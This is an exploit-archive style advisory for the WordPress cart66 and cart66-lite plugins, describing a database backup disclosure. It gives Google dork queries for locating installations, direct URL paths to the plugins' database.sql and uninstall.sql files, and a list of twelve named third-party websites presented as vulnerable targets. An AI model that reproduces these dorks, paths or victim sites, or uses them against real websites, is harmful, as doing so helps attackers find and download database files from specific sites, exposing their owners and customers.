################################################################################################# # Exploit Title : WordPress cart66 cart66-lite Plugins 1.0 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 03/12/2018 # Vendor Homepage : cart66.com ~ wordpress.org/plugins/tags/cart66/ ~ github.com/wp-plugins/cart66-lite # Software Download Link : github.com/wp-plugins/cart66-lite/archive/master.zip # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Version Information : 1.0 # Google Dorks : inurl:''/wp-content/plugins/cart66/'' inurl:''/wp-content/plugins/cart66-lite/'' # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2263 # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/cart66/sql/database.sql /wp-content/plugins/cart66/sql/uninstall.sql /wp-content/plugins/cart66-lite/sql/database.sql /wp-content/plugins/cart66-lite/sql/uninstall.sql ################################################################################################# # Example Vulnerable Sites => [+] oakridgebikeshop.com/wp-content/plugins/cart66-lite/sql/uninstall.sql [+] nuchabad.org/wp-content/plugins/cart66/sql/database.sql [+] petchefct.com/wp-content/plugins/cart66-lite/sql/database.sql [+] dogtread.com/wp-content/plugins/cart66/sql/database.sql [+] fowlerlumber.com/wp-content/plugins/cart66/sql/database.sql [+] chicked.com/wp-content/plugins/cart66/sql/database.sql [+] domainite.com/wp-content/plugins/cart66/sql/database.sql [+] thehealersjournal.com/wp-content/plugins/cart66-lite/sql/database.sql [+] powercore.net/wp-content/plugins/cart66/sql/database.sql [+] skuff.us/wp-content/plugins/cart66/sql/database.sql [+] cececlark.com/wp-content/plugins/cart66-lite/sql/database.sql [+] impactics.com/wp-content/plugins/cart66-lite/sql/database.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################